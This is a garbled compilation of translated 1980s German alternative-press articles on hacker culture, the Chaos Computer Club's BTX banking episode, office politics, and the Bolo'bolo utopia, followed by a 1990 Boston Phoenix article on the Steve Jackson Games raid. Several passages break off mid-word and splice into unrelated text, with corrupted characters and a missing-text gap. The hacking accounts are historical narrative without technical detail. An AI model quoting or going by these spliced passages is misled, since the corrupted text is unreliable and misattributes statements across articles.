office culture.  Many more people, however, will fall victim to the plundering
of the country and the devaluation of their traditions in the hands of
multinational capital.

[pp 55-56:  Unattributed article]

Down in the Valley

Mail Wars

After the top management of "Tandem" announced the hiring and wage freeze in
November 1982, I arrived at my job the next day to find an electronically
transmitted message that had been sent by a courageous technician who worked
for a distant branch of the company.  The message protested the wage and hiring
freeze--such measures were disgraceful and unjust.  The electronic letter--and
the mail network--allows direct connections between most employees, even if
they are separated by thousands of Hwhat is not,
what is recorded and what is forgotten."  [Footnote:  Jaques Vallee, "Computer
Networks," 1984, rororo 8101, DM 12.80, p 115]

Why are there no alternative software producers?  Are niches so abhorrent?

Let me make it perfectly clear:  I am for the computerization of our planet. 
The problems we are facing concern the earth as a whole.  Global, alternative
networking must be massively advanced.  A present-day computer has a memory
capacity of 64 kilos of bytes.  Multiplied by x-number of users worldwide, and
you have an unbeatable potential for creativity.  The melting pot of
alternative, green, lavender, checkered, etc. itself offers elbow room where
innovative ideas are developing en masse.  The only question is:  Where is the
application in practice?

The computer is an extremely universal tool.  I can make it do many boring,
monotonous administrative functions.  Word processing alone offers completely
new possibilities for dealing with words.  Everything can be combined with
graphics and music.  Data telecommunications.  Things are copied, simulated and
stored.  Everything can be printed out once or umpteen times.  Color.  Games. 
Control.  Manipulation.  Very small computer-controlled work stations can be
set up.  Here, the ideas can be (self-) realized.  Sales and marketing can be
done through further expanded telecommunications networks.

Why not try to take away the professionals' livelihood?  Niches can be very
flexible.  There are so many awful programs, and rarely good advice.  And
projects lack the money before and after.

"Blue Bazoobi":  The project builds computers.  Small portable terminals to
control air pressure valves.  DM 20,000 a piece.  Sold to Singapore, Brazil and
China.  The market niche is an area of application that is not feasible for the
pros, due to a lack of large volume.  There are fifty copies right now.  The
"Flying Robert" project will be financed with the money earned.  So things are
coming along.  A broad field of activity is opening up.

Effective immediately, the CCC is offering advice in all situations for the
Apple II computer.  Address for complements and the like:  TAZ Hamburg,
Apfelmus Department, Nernstweg 32, 2000 Hamburg 50, Wolfgang CCC, Kraut & Rben
Department.

[p 45:  Article by "Wau"]

Practical Note

Data processing is slowly but surely entering our everyday life.  It is
difficult to resist it.  A couple of practical notes:  Never release data if it
does not immediately seem reasonable to you.  Even then, be careful.  Asking
questions is free, but there must be time for it.  Make it clear that your data
is very personal, and ask how the people who are requesting your data handle
data protection.  Cancel your direct-debit order.  Think about what one
programmer at the electricity company could do with a couple million automatic
debit orders.  Don't get cable.  Keep your own data in order and do not let
someone else do it, even if it is more comfortable that way.

[p 46:  Article from GELSENKIRCHENER STADTZEITUNG]

Burglar Alarm

There were several questions about the burglar alarm, so here is the sketch
again.

The original dimensions of 60 x 80 mm should be adhered to rather closely.  The
copper wire (naturally insulated, otherwise it would be no good) can be found
in any electronics store, as can the capacitor.  With the copper wire arranged
as above, 30-40 picofarads cause a so-called field deviation within the
electronic fields between the bows, which is registered via the electronic
circuits.  The alarm is then triggered by way of a relay, and the detective is
there.  So far, so good.

The copper wire is soldered to the ends of the contacts.  While soldering, be
careful not to destroy the capacitor.  It would be great to have small-scale
mass production of this or other subversive products.

[p 47:  Article by "Wolfgang"]

The Future:  Entropy and Yeast Dough

Yeast dough, a so-called raising agent.  The dough must be handled carefully. 
A cool draft of air and it falls.  The nice swelling action turns into the
opposite.  Chaos among the bacteria!  (Yeast is a fungus, note from
headquarters.)

Institutions:  Objects that permanently grow.  Rising agent:  Money.  The
swelling process, shaken by crises, can drag on for decades.  Until the self-
sown storm is too powerful.  The system TILT.  Chaos among the bureaucrats!

Entropy says that the amount of energy in the universe is always constant. 
Nothing can be added, nothing used up.  Energy changes its "manifestation."  It
transforms itself from a state available to man to one not available to him.

All of our environmental pollution is a manifestation of our high-entropy
economy.  "In the three summer months alone, the United States consumes more
electricity for air conditioning than the population of the People's Republic
of China uses for its overall needs for the entire year.  And China has four
times as many people."  [Footnote:  Jeremy Rifkin, "Entropy," Hoffmann & Campe
82, p 134]

Everywhere that there is activity, energy is being transformed.  The available
supplies are evaporating appreciably.  Technology is going astray:  nuclear
technology, fusion technology, genetic engineering...

All systems where the energy input is greater than the output:  pacemaker for
cancer!

The oven is cold!

The dough has fallen.  Only rock-hard bread is possible now.  We have to make
do with what we have.  Or do we?  A new dough?  With a significantly different
recipe?

Are complex systems capable of innovation?

Of course not.  A ridiculous example:  Our diligent scientists are promoting
fusion technology as the solution to all our energy problems.  The bare facts
point to another conclusion.  The deuterium-tritium reactor needs tritium
molecules.  Tritium is obtained from lithium, an element that is as rare as
uranium.  Thus, limitless economizing is not possible.  Similarly necessary
substances, such as niobium and vanadium, are becoming more scarce even today. 
To say nothing of copper.

And the culmination of innovation potential:  The hydrogen-boron reactor,
filled with sea water, has a reaction temperature of three billion degrees
Celsius.  Just let that number roll slowly off your tongue!  There is no matter
that could even come close to standing up to that temperature.  The deuterium-
tritium reactor needs only 100 million degrees Celsius.  Nothing more practical
is possible.  "All applications of nuclear technology appear to him as if one
were using a chain saw to cut butter."  [Footnote:  Rifken, p 129]  Every
change in complex systems will by necessity cause changes in other places and
at different times.

The degree or the size of the complexity is critical in determining:
-  the effect of only one change, or of many changes;
-  the momentum of these changes, which, for example, are in turn the cause of
   further changes, etc...

Very interesting "autonomous," cumulative feedback processes can be set in
motion here.

The gaps discovered by hackers are naturally stopped up.  How?  With knitting
yarn.  That is, hardware, software and human beings are transformed, and thus
energy is used.

Since the earth is a relatively closed system (aside from solar energy, nothing
significantly is added), the following applies in particular to our planet: 
"In a closed system, material entropy must ultimately achieve its maximum." 
[Footnote:  Rifkin, p 50]

It is precisely the many changes in all institutions that are causing an
increase in energy consumption.  On payday, the co$t then?  Should we sell this breach
of security to the Bundespost?  We could, as is normal in industry, "hack" DM
100,000 or more and then sell the Bundespost consultation on this problem for a
certain percentage of the money.  Or get free, lifetime telephone service for
the CCC or something like that.  The Bundespost had to pay for its gross
negligence.

In both cases, however, the price would have been silence.  Otherwise, the
concentrated rage of the postal authorities would have been forthcoming. 
Consequently, perhaps half a dozen officials would have tried to do something
to the CCC.

But the CCC wanted enlightenment about the risks of this new system.  To this
end, the finance transaction had to be made public.  Fine, but who should push
the starting button for the money transfer?  After all, it is an infringement
like a parking ticket, although more expensive:  a DM 50,000 fine.  Will the
data protection commissioner do it?  He probably would have taken advantage of
the opportunity and attempted to achieve an improvement by official means.

A politician?  Perhaps.  But what if he leaks the story?  There remained only
one option:  Do it ourselves, and abrogate our criminal liability by going
public with it.  A week later, the attempt failed, since the FTZ had in the
meantime closed off free access to its connection.

Hackers as Data Protection Specialists

Several weeks later, Wau gave a presentation at a conference of data protection
specialists in Cologne:  BTX--El Dorado for Hackers.  Cologne was a sea of pin-
stripes, and Wau looked like a parrot in the midst of it all.  Despite their
initial distance, the audience was impressed by his presentation.  Only the
representative of the Bundespost felt that he was hitting below the belt, and
that he did not intend to address those issues.  That was dismissed with
laughter, since the presentation depicted a series of program bugs drastically
and in three dimensions.  There is a bug in the sending of electronic mail. 
The sendlled this
because the people who flashed on it are coincidentally named Rivest-Shamir-
Adleman.  Clever as mathematicians are, it occurred to them that you could take
a text like DAS IST JA ZUM KOTZEN [THAT'S DISGUSTING] and break it down into
TX system spits out internal system information.  With a
little luck, connection code words and secret passwords can be detected in this
way.  "Nonsense," said the Bundespost representative.  And to the offer of
cooperation came only the response, "First you have to get serious."  It is
unclear whether the CCC succeeded in doing so.  At the very least, the BTX
system finally spit out the connection code word and secret password of the
Hamburger Sparkasse after a number of tries with the well-known system bug. 
Thus, it became possible to carry out the presentation planned for the FTZ with
the Sparkasse instead.

Almost everything went as planned.  Over night, in 12 hours and 59 minutes, a
good DM 134,000 was raised.  With a portabf @%en run in a
daily newspaper, and a meeting of two dozen people from all over West Germany
then took place in Berlin.  We then decided to keep in touch and exchange
experiences.  The idea was simply to put together a magazine, but at that point
it was all too vague, and it didn't come off.  Next, contacts with the United
States were established, with Cheshire Catalyst (the "king" of U.S. hackers,
Ed.) and with his magazine TAP, which a bunch of people here in West Germany
already knew about and subscribed to.  At the Telecom in the fall of 1983, I
met him personally and wrote a two-page article about him in a daily newspaper. 
And this two-page article elicited a great deal of response.  By the end of the
year, things had progressed far enough to set up a magazine.  Previously, the
idea was to exchange all information by floppy disk, but everything was
incompatible, and it had no purpose.  The magazine was announced around the
beginning of the year, and we received 100 replies within one week.  And so to
us in Hamburg, it was obvious:  If 100 people want it, then it has to be done. 
In March, the first issue was finally finished.  Once the first and second
issues were out, there was a veritable flood of letters.  The amount of mail
was equivalent to placing both my hands on end.

[Question]  How many subscriptions does the magazine have?

[Answer]  We took the course that whoever writes should get information,
regardless of whether they send money in.  The number of subscriptions
fluctuates somewhere over 200.

[Question]  How do your finances look right now?

[Answer]  Terrible!  The production costs are around 10 pfennigs per copy, for
both sides of a DIN A3 page.  On the other hand, the most expensive thing is
postage, 50 pfennigs a piece.  For each copy there are three copies that are
not paid for, that we simply send out, as a sample or in response to a request
with no money enclosed.  It is in fact financed by the skin of our teeth, but
we do hope that a number of people are willing to pay for it.  If money comes
in, then we can continue.

[Question]  And of the 200 subscriptions has each one paid around DM 30?

[Answer]  More or less.  They came in with the full amount, a couple sent more
than that, but unfortunately it was fewer than we had hoped.  It costs about DM
1000 to produce one issue of DATENSCHLEUDER.

[Question]  How long will people receive DATENSCHLEUDER for their DM 30?

[Answer]  One Chaos year.  That is effectively around one year, with around 10
issues.  You definitely have to give our address, or they'll come beating your
door down for that.

[Question]  How many regular members do you have now?

[Answer]  About the membership structure--it's rather open and free.  Everyone
who has information for us simply contributes it, whether he has a subscription
or simply receives DATENSCHLEUDER, or even if he knows nothing about
DATENSCHLEUDER.  There are people who are working on the modem layout, and we
are producing and marketing motherboards, for example.  And then we do
DATENSCHLEUDER, and also do communication via computer.  It is simply an open
structure, where anyone who feels like it can join in and leave at any time. 
But we are thinking about whether we should impose organizational structures on
the whole thing.  There are a couple of external areas where we are simply
encountering problems.  But on the other hand, we basically like this open
structure.  It's a dilemma.

[Question]  But surely you can provide an approximate number?

[Answer]  If we approach it in terms of subscriptions, we come up with more
than 200, of which around 30 are in Hamburg.  But that's very fluid.  Should I
count a graphic artist who does a couple of pictures for DATENSCHLEUDER as a
member?  We don't look at it that narrowly.  Somebody comes along, finds it
interesting, and joins in.  That's also how it is at our meetings, which we
hold once a week at a bar here in Hamburg.  We always get different people
there, it's just a regular meeting base.  On the other hand, we generally meet
once a month to exchange information.

[Question]  What kind of people are involved?

[Answer]  It ranges from pilots to a metalworker, people who run their own
shops to unemployed people and students.  They are between 16 and 35.  No one
is older than that.

[Question]  What is your assessment of the legal status of your activities?

[Answer]  We just don't like being forced into any corner.  Now people are
saying that it's all criminal, breaking into data base
together with the other supervisors.  However, Al's fate was left hanging.  As
we left the meeting, one of my colleagues commented, "I'm not satisfied with
the number of corpses."

Al and the production head were soon thereafter demoted and privately urged to
seek employment elsewhere.  They were gone within a couple of months.  Several
days after the meeting, several computer programs that are used in manual
production were sabotaged.  It appeared that the supervisors who were fired had
computers at home, and thus still had access to the computer through the
telephone lines.

At the end of the meetings with the honchos, the head of our company grumbled
about the "animosity" that had developed in our department.  As if capitalism
is not based on "animosity"!

While "soft management" can be used by employees to their own benefit in
situations like the one above, we should keep in mind that it is not simply a
"gift" from our superiors.  The less authoritarian style of leadership exists
because many companies regard it as a more effective method for gaining the
cooperation of the workers in order to thus achieve management goals.  But it
is regarded as effective only in terms of the opposition, both passive and
active, by workers to openly authoritarian methods of management.  Soft
management does not--cannot--eliminate the very real conflict of interest
between workers and employers.  The fact remains that workers neither manage
the operation nor have control over the capital.  This makes conflict
unavoidable.

[pp 59-60:  Article from PARANOIA CITY LADEN]

Bolo'Bolo

Departure

Seven-thirty in the morning, 25 March 1983, on the number 32 bus.  It is
raining and it is cold, later it will snow.  There are empty seats, and so I
sit down.  I feel the wetness through my shoes and pants.  I see the calm,
composed faces.  A young woman suppresses a yawn, draws the corners of her
mouth down.  "Nordstrasse."  Several passengers get off and move away briskly. 
Once again, I am struck with this feeling of alienation.  "What's it all
about?"  "Why I am going along with it?"  "How much longer?"  Revulsion is
building up in my chest.  The everyday machine once again has me in its grip. 
I am moved inexorably towards my job.  Scarcely wrenched from a sound sleep, I
am again helplessly sitting in the workforce transport machine.

I imagine taking the bus to the terminus and then beyond:  through Austria,
Yugoslavia, Turkey, Syria, Iran... to India, Malaya.  During the trip, the bus
changes little by little; it is repainted, repaired, converted, equipped with
beds.  The passengers are transformed into a close-knit community.  They work
as we go in order to get fuel, the replacement parts and food.  They tell their
stories.  They act against the everyday machine using diverse means:  refusing
to produce, sabotage, intentional sloppiness, stealing, indiscretions, sick-
leave abuses, arson, solidarity campaigns.  The brutality of the machine can be
explained by the resistance to it.  Five years later, the bus returns.  It is
colorful, has curtains, additions, inscriptions in unknown alphabets.  No one
recognizes it, and the returnees are strangers...

Bus stop.  The dream is over.  Weekends, holidays, illusions always come to an
end, and we are once again sitting obediently in the bus or streetcar.  The
everyday machine triumphs over us.  We are part of it.  It dismembers our life
into portions of time, soaks up our energy, plows our desires under.  We are
reliable, punctual, disciplined cogs.  Why do we function?

Deal

The everyday machine does grind us down, although at the same time it immunizes
us against revulsion, hate and despair.  We feel these things only for brief
moments, when we have nothing to do and at the same time cannot consume
anything.  In the morning we look forward to the evening, on Monday we look
forward to Friday, at the end of vacation we look forward to the next vacation. 
We give the machine our time and energy, but at the same time it provides us
with (depending on salary) a number of pleasures:  steaks, stereos, Mykonos,
wind surfing, Aikido, video, Chivas Regal, arts synthesis, Laurie Anderson... 
This is our deal with the machine.  This is our balance of life and work.  And
it has been in the red for some time now.

Even though real wages have fallen and the rat race has intensified, this is
not the main reason for our life deficit.  The "pleasures" that the machine has
to offer us are essentially polluted, and we ourselves are less and less
capable of truly enjoying them.  On the one hand, we get mass products that
spoil us faster and faster, and on the other hand our work dulls our senses so
much that we become passive, isolated, unimaginative, lethargic and narrow-
minded.  As satisfaction decreases, our craving for pleasure increases.  The
large hole that the machine has carved in us simply cannot be filled.  We can
cram our apartments full of electronics, travel far away, do gymnastics,
psychology courses, creativity and meditation, illegal and legal drugs:  But we
cannot get away from ourselves.

The deal is rotten, because the "good things" are destroyed by the machine:  we
ourselves, time, relationships, nature, traditions.  Although we can travel
ever-faster and ever-farther, our freedom of movement in everyday life is
decreasing.  Economization, renovation, redevelopment and standardization track
down every "free" second and every unused square meter.  Time and space are
money.  The machine uses money to implement its logic.  We are locked in,
budgeted, clean and orderly and unhappy, although we don't really have any
"reason" to be.

Security

We are gagging on aversion.  We have sensed for some time now that the old deal
has gone bad, and always was bad.  The illusions of consumption, of technology,
of the "modern" industrial society in general, are crumbling.  Why don't we get
out?  Has the machine swallowed us up for good?

Fear of the unknown is stronger than revulsion for the everyday.  The machine
appears to be the only possible reality.  Habit.  Security.  Reason.  Normalcy. 
Power.  Who guarantees our survival if we leave or destroy the machine?  Where
is the medical care, the retirement and survivors' benefits, the insurance?  We
are alone, and the machine is our only security in life.

Thus, we try to suppress our feelings, our reason and our doubts so that we can
function.  We convince ourselves over and over again that this is how life is,
and that no other way is possible.  Thus, we need normalcy to protect ourselves
from understanding our unhappiness.  We are a conspiracy of unhappy people who
together defend their unhappiness.  Whoever draws attention to this
unhappiness, assails it, is met with hate and envy.  Whoever does not go along
with it becomes a disrupter, a parasite, a weakling, a failure, a dreamer or a
terrorist, depending on the degree of hate that is felt.  Dropouts encounter
the perverse solidarity of those people who have understood the seriousness of
life, who have both feet on the ground, who can be proud of their deprivation
and frustrations (also known as achievements)...

But how safe is the machine, anyway?  Is solidarity with it worthwhile?  What
is the source of this strange nervousness of the defenders of normalcy?  The
truth today is that this imposing machine, industrial society, is inexorably
pushing forward towards collapse.  Not only is it sucking us dry, it is also
destroying itself.  Industrial wealth is based on labor, but labor is being
superseded by automation and electronics, resulting in mass unemployment.  The
more complex the machine becomes, the more work that must be expended on
repairs, administration and control.  Maintenance of the machine requires more
work than the value that it generates on its own.  The harm to nature and to
health that it inflicts is growing faster than production.  The "health sector"
is exploding because our sickness is the most important product of the machine. 
Industrial labor proves to be purely destructive work.

The current long-term economic crisis is the result of the internal
contradiction of the machine.  When there are upswings, they represent only
small "recoveries" on the downward spiral.  Each boom period leaves behind a
larger stock of unemployed people.

If the economy is in crisis, then this is also true of the welfare state.  A
collapse of the monetary system could sweep away our retirement and survivors'
benefits, our insurance and pensions, at any time.  Our "guarantees" are only
on paper--we have no recourse for getting what is owed us.  Our faith in state
security is only an expression of our actual powerlessness and isolation.  A
couple of good friends will be worth more than your retirement fund card or
savings passbook.

Realistic Politics

Perhaps the machine can still be changed and converted, so that it becomes
safer and more humane?  Why not eliminate unemployment by introducing the 20-
hour work week, while at the same time applying leisure time to self-help and
self-sufficiency in neighborhoods and in the social domain?  In this way,
everyone would have work, and the state could save on most welfare
expenditures.  Why not restrict private transportation, invest more in public
transport, save energy (no atomic power plants, more insulation), recycle
garbage, eat less meat, introduce strict laws on the environment, strengthen
health care, delegate administration to the neighborhoods ("autonomous
sector"), abolish the armies?  These reform proposals are reasonable, realistic
and in fact feasible as well.  Thus, they constitute the official or unofficial
program of the "enlightened" alternative-social democratic-green-mixed [text
missing] just as those who start a popular initiative for the 40-hour work week
or set fire to a speculator's villa.  Both know that the 40-hour week will
scarcely change the machine and that speculation will nevertheless continue. 
Thus, this political reason actually conceals a lie:  People act as if they
will gain something from their action, while knowing that even if their route
is the right one they will be long since dead once the "goal" is achieved. 
They will become a hero of history, and will soon feel cheated.  Disappointment
demands a "reward," and only the machine can provide that.  And so yesterday's
partisan becomes tomorrow's minister of police...

Thus, we cannot avoid first expressing our very "private" dreams, so that we do
not deceive each other.  Morale and realism are the machine's ideological
weapons, and for that reason, we must dare to be both egotistical and
ridiculous.  Perhaps it will be obvious then that the "others" are not that
"different," but that we are all more alike than we think.  Perhaps the
majority, the people, the masses, society, the voters, etc. are only a puppet
of the machine.  Counter to the "first reality" of the machine, we must develop
our "second reality."  It is our only change, because the first (including its
possibilities for improvement) is definitively on a dead-end road.

The machine attempts to take hold of the "second reality" and to digest it as
culture.  Dreams are planned for and delimited as films, music, novels,
vacation sites, etc.  Mixing the first and second realities is carefully
avoided.  We must break through this channeling of our desires.

Today, the "realistic" attitude is one of "all or nothing."  Either we achieve
rather quickly the jump from the first to the second reality, or both are lost
together.  Apocalypse and the gospel.  End of the world or utopia:  These
possibilities stand in sharp juxtaposition today.  We must chose between a
final, cynical pessimism and a "salto vitale" into an entirely different world. 
Either apocalyptic enthusiasm or total resignation.  Today, a middle-of-the-
road position such as "hope," "faith" or "patience" is merely self-deception or
demagogy.

The "nothing" is possible today, and it has also become a world view with which
it is quite possible to live.  We do not necessarily have to survive.  "Life"
as well as "nature" do not care whether they continue to exist.  Making a
"value" out of survival and nature brings with it only totalitarian risks
(ecological fascism).  The apocalypticists, nihilists and pessimists have good
arguments for their decision.  They have their lifestyle, their fashion, music
and philosophy (Schopenhauer, Cioran, Buddhism).  Perhaps the pessimists are
even the ones who are truly "happy," and the impending atomic or ecological end
of the world is the great deliverance from the torturous "life drive."  But
this is not what I am talking about.

The "nothing" is one possibility, the "all" is another.  Thus, if I attempt to
depict my phantasies about "all," then this is not to say anything against
"nothing."  In contrast to nothing, "all" today is relatively poorly defined,
and appears to be less realistic.  No one subjects himself to ridicule through
pessimistic predictions.  It is worth expanding the "all" somewhat, if for no
other reason than to perhaps make "nothing" even more enticing...

Politic Real 

During my reconnaissance missions into the second reality, I came across
bolo'bolo.  This is my provisional, personal dream of a world in which I would
like to live as a vagabond or in a certain bolo.  To this extent, it is quite
serious.  On the other hand, it is only an idea shared by many people, a
hypothesis that can be dreamed up and then forgotten, a disposable utopia.  I
would really like to see bolo'bolo become reality within five years, but I also
know that it can only be a flip among many.  Even if it is only an incentive
and encouragement to others to let out their fantasies for the future as well,
then bolo'bolo would serve its purpose...

I imagine that bolo'bolo or other dreams could entice those resigned to real
politics out of their apathy, and that in this way a new "politic real" could
emerge.  A politics (i.e., contact with oneself and with others) that is based
not only on preventing the "worst," but also on certain, wherever possible
practical, but also comprehensive ideas, from whence it then attempts to
project itself into the present.  This could mean, for example, trying to
establish tega-sadis (see below) even today, and demanding the proper
buildings.

However, it is not really a question of assessing the feasibility of bolo'bolo,
nor of its (modest) potential uses in present-day situations; rather, it is a
question of itself.  For this reason, I have gone to some (but not too much)
effort to determine whether bolo'bolo could function, in purely technical
terms, in an area like Switzerland (which would in that case not necessarily
continue to exist), and how long it would take to implement it.  The available
data indicate that bolo'bolo could be essentially introduced within five years. 
I have taken the fears of many people in Switzerland (one of the most heavily
insured countries in the world) into account and determined that no one would
have to starve, freeze to death or die any earlier than today.  Bolo'bolo
guarantees a soft landing into the second reality.

Five years (only three, according to the delegate for economic war provisions)
would be enough time to convert agriculture to self-sufficiency.  Through
improvisation, understanding and joy in chaos, the major confusion can be
overcome.  If the nimas are strong enough, the state machinery can be paralyzed
and the factories are shut down, there will be enough time and energy for the
big day of restraint X.

Still, bolo'bolo is a planetary arrangement and can only exist if it is at
least dominant on a worldwide scale (about the same degree as the money economy
today).  Nevertheless, bolo'bolo as a beginning in a country--such as
Switzerland, which is especially well-suited to it--is conceivable, since it is
part of the worldwide process.  Switzerland could move ahead, since it is
compact, it would not cause any major political shifts, it has a certain model
character in terms of level of industrialization, and it is also centrally
positioned in Europe.  The disruptions in the international banking system
could also be overcome...

But things could turn out completely different.

[p 61:  Unattributed article]

Secret Code Detected by Satellite?

United States Engrossed in Spectacular Data Theft

New Brunswick (DPA)--The U.S. media are currently engrossed in a new,
spectacular case of "data burglary" reportedly involving seven young computer
enthusiasts, known as "hackers."  The young people, who live in New Jersey and
whose names have not been disclosed because they are all under 18 years of age,
are said to have tapped into data bases, penetrated the communication system of
the telephone company AT&T, and even cracked codes in the Department of
Defense.

As the prosecutors reported, telephone services and data bases were supposedly
hit for thousands of dollars.  Some estimates of the damage even go into the
millions.  The young people, who are being charged with "conspiracy to theft,"
are said to have stored code numbers in their home computers with which the
positions of communications satellites can be altered and transcontinental
phone calls can be interrupted or placed.

On one of the hackers' electronic bulletin boards, coded telephone numbers were
found that gave the teenagers access to a communications system in the U.S.
Department of Defense, said district attorney Alan Rockoff.  "We dialed one of
the numbers," says Rockoff, "and got a lieutenant general at the Pentagon."

According to the daily USA TODAY, the hackers also called in information on
U.S. Army tanks, and ordered stereos and radar detectors from mail-order houses
using stolen credit card numbers.  In order to assess the full range of the
"data theft," the prosecutors must still examine six computers and mountains of
floppy diskettes.

The seven accused hackers reportedly did not know each other personally, but
rather exchanged information via their computers.  In an interview with the NEW
YORK TIMES, one of the teenagers said that he was innocent, and thus not
particularly upset by the charges.

An AT&T spokesman said that there was no indication that the young people even
attempted to alter the positions of satellites.  And the Pentagon assured that
its computer systems are hacker-safe.  Based on previous experience with
hackers, however, computer experts doubt this assertion.

[p 61:  Unattributed article]

Engelhard Wants to Restrict Computer Crime

Targeted Prosecution and "Social Control"

Bonn, 16 July--Minister of Justice Engelhard wants to strengthen efforts to
halt white-collar crime by creating criminal liability for "computer crimes." 
Besides improving judicial organization through white-collar crime divisions
and using "targeted prosecution," rethinking in terms of "social control" is
also necessary, the minister believes.  Despite the large amount of damage that
they inflict and their assault on the foundations of the economic system, these
criminals continue to be secretly admired.  "White-collar crimes must be
subjected to the same level of ostracism in our society as other criminal
misdeeds."  He added that this is not the equivalent of skipping out on a bar
tab, riding the streetcar without paying or sneaking a beer on the sly. 
Rather, public prosecutors estimate that white-collar crime inflicted damages
totalling DM 6.9 billion in 1983.

Up to now, Engelhard said, it has been particularly difficult to uncover and
punish criminal acts conducted with computers.  The second law on combatting
white-collar crime, which is currently under deliberation in the Bundestag
justice committee and which he hopes to see passed this year, should close
legal loopholes.  In many cases, the current provisions have been inadequate. 
For example, if money is set aside for one's own benefit through a computer
manipulation, then this cannot be considered embezzlement, since that crime
presupposes a special role by the perpetrator in overseeing the money that he
"burgled."  Another example:  Withdrawing a sum of money from an automatic
teller machine using a falsified ATM card is not necessarily robbery under the
law, since the money is not acquired through breaking into someone else's
safekeeping, and since the money in question is not a purloined object, but
rather a claim by the account-holder from his bank.  Engelhard provided a
planned list of punishable computer crimes:  computer manipulation, computer
espionage, computer sabotage and unauthorized use of data processing.  As an
example of computer manipulation, he cited the example of an employee with a
Bavarian employment office who had DM 250,000 credited to his family by
improperly inputting child subsidy payments, including alleged child subsidy
payments for his grandparents, who were over 80 years old.  As "computer
espionage," he noted the experiment by a Hamburg "Chaos Computer Club," which
managed to acquire the password for the Hamburger Sparkasse, which enabled them
to repeatedly call in BTX pages and perpetrate a fraud to the tune of DM
135,000.  However, this took place under the supervision of the Hamburg data
protection commissioner.  As potential sabotage, the minister mentioned the
insertion of a "logical time bomb" in a program.  Someone had instructed a
program to destroy itself two years after its release at three o'clock in the
afternoon, which did in fact happen.  For several days, 300 terminals were out
of order, Engelhard said.  An insurance company dealing with computer misuse
surveyed 13,000 companies with data processing, 30 percent of which indicated
the presence of manipulation of data processing.  Engelhard also turned his
attention towards  the misuse of home computers by "hackers."  The cracking of
access codes, he said, is not a game, but rather "electronic trespassing."  Nor
is stealing programs (software piracy) a trivial offense; a Hanover high school
student allegedly inflicted damages totalling DM 23 million through
unauthorized copying.  Thus, Engelhard said, it is proper that programs be
covered by copyright in the amended copyright law, and that criminal acts
henceforth be punishable by a maximum sentence of five years in prison (was one
year).

Furthermore, the second law for combatting white-collar crime is intended to
avert capital investment fraud and curb dubious futures trading, as well as to
standardize the mix of penal provisions pertaining to the misappropriation of
wages.this article is from the Boston Phoenix, September 7, 1990

Hackers under attack
-----------------------
Crackdown raises questions about new forms of speech
-----------------------
by Mark Leccese

	The First and Fourth Amendments (ensuring free speech and 
protection against unreasonable search and seizure) became dust in 
the wind on March 1, in Austin, Texas, when US Secret Service busted 
Steve Jackson Games for no reason anyone can explain. The firm was 
preparing to market a Dungeons and Dragons-type game called GURPS 
Cyberpunk when the feds raided its headquarters, seized the 
computers the company was using both to create the game and 
maintain a computer-bulletin-board system (BBS) for dialog with its 
customers. The feds also confiscated software, company records and 
all available drafts of the book. Law enforcement officials even tried 
to pry open locked file cabinets with letter openers they found on 
employees' desks.

	And yet, as Jackson told the Phoenix, "No one connected with 
the business was ever arrested, charged, indicted or even questioned" 
after the raid, which put the company temporarily out of business.

	Steve Jackson Games appears to have been an early-year victim 
of a federal war against "hackers" - persons who gain unauthorized 
access to other people's computers - that began with a raid in Arizona 
on May 8 and escalated into a nationwide sweep known as Operation 
SunDevil covering 14 cities and involving more than 150 Secret 
Service agents.

	As John Perry Barlow, a Wyoming rancher, expert on computer 
hackers, and long time lyricist for the Grateful Dead ("I Need a 
Miracle," "Hell in a Bucket," "Mexicali Blues"), sees it, computer abuse 
can be divided into three categories: crimes committed by insiders; 
crimes committed by hackers who steal, say, credit card numbers and 
long distance phone codes; and gaining of access - just for the purpose 
of looking around and learning - by computer "phreaks."

	Everyone agrees that the first two are crimes, including the 
Electronic Frontier Foundation (EFF), an organization co-founded by 
Barlow and Mitchell Kapor, the Cambridge-based wizard who designed 
Lotus 1-2-3, to educate the public and the country's leaders about the 
electronic world, lobby for change, and when necessary take legal 
action such as filing friend-of-the-court briefs. The controversy 
surrounds the third category of abuse, which many hackers 
characterize as harmless high-tech fun. "The government is drawing 
no distinction" between these kinds of activities, says Barlow.

	The Secret Service held the confiscated material for three 
months while Jackson tried, in vain, to find out why it had been seized 
in the first place. According to attorney Sharon Beckman, of the Boston 
law firm Silvergate & Good, which represents the company, the 
government's application for a search warrant - which would describe 
what its agents were after - has never been released. "So far, I haven't 
heard anything to indicate probable cause," she says.

	The only thing a search warrant authorizes government agents 
to seize, Beckman contends, is information relating directly to a crime 
or a criminal conspiracy. The kind of "fishing expedition" conducted at 
Steve Jackson Games, she says, "is against the Forth Amendment" of 
the US Constitution.

	After Jackson wrote to his congressmen and, with his lawyers, 
applied pressure on the feds, most, but not all, of the property was 
returned - some of it badly damaged. "There's one computer I'm not 
even going to turn on unless I have a fire extinguisher handy," he 
says.

	During the time the government was holding on to Steve 
Jackson Games' equipment, the small business had to lay off eight of 
its 25 employees, none of whom have been rehired. "They cost us an 
awful lot of money with their little visit," Jackson says.

	All this apparently for a fantasy game with imaginary futuristic 
weapons - one Beckman describes as akin to "as James Bond movie. 
James Bond has all kinds of special tools, too, but the government 
doesn't close down James Bond movies because they could teach 
people physical-trespass skills."

	Says Jackson of the government gumshoes: "These people don't 
have enough expertise to tell fantasy from reality."

	The Jackson raid and the Operation SunDevil forays represent 
the fed's opening gambit is what many worry could be a major civil-
liberties debacle. The culprits in these Kafka-esque trials are the ever-
proliferating digital electronic impulses carried across what is known 
to computer aficionados as "the net," or, to sci-fi fans, "Cyberspace" or 
the "virtual" world - a vast and complex web of computer networks 
that make up the electronic frontier, where nothing exists in physical 
form but the hardware used to translate the bleeps into information.

	The frontier is unmapped, confusing, and infinitely expandable. 
Like the 19th-century American frontier, it is populated mostly by 
earnest settlers searching for new knowledge, but it also has its share 
of fringe characters and desperados taking advantage of the wide-
open spaces. With the advent of electronic mail, BBS's and publications 
that never put ink on paper, technology has out-paced the law. Forty 
years ago the government saw a Red under every bed; now it sees a 
hacker behind each keyboard. Over the past two years, the lawmen, 
led by the US Secret Service, have come crashing across the plains, 
dispensing frontier justice. Some actual criminals have been arrested 
and convicted, but the government, in its zealousness and ignorance of 
this new land, has also rounded up many innocent computer users 
and, in the process, trampled constitutional rights.

	Notes Kapor, "We get into trouble when we blindly try to apply 
the laws for physical media to digital media. We have to reinterpret 
what data and speech and property are."

	The Senate Judiciary Committee is now considering an 
amendment to the 1986 Computer Fraud and Abuse Act that would 
create a "recklessness" misdemeanor under which computer users who 
gain illegal access to a system and accidentally cause damage would be 
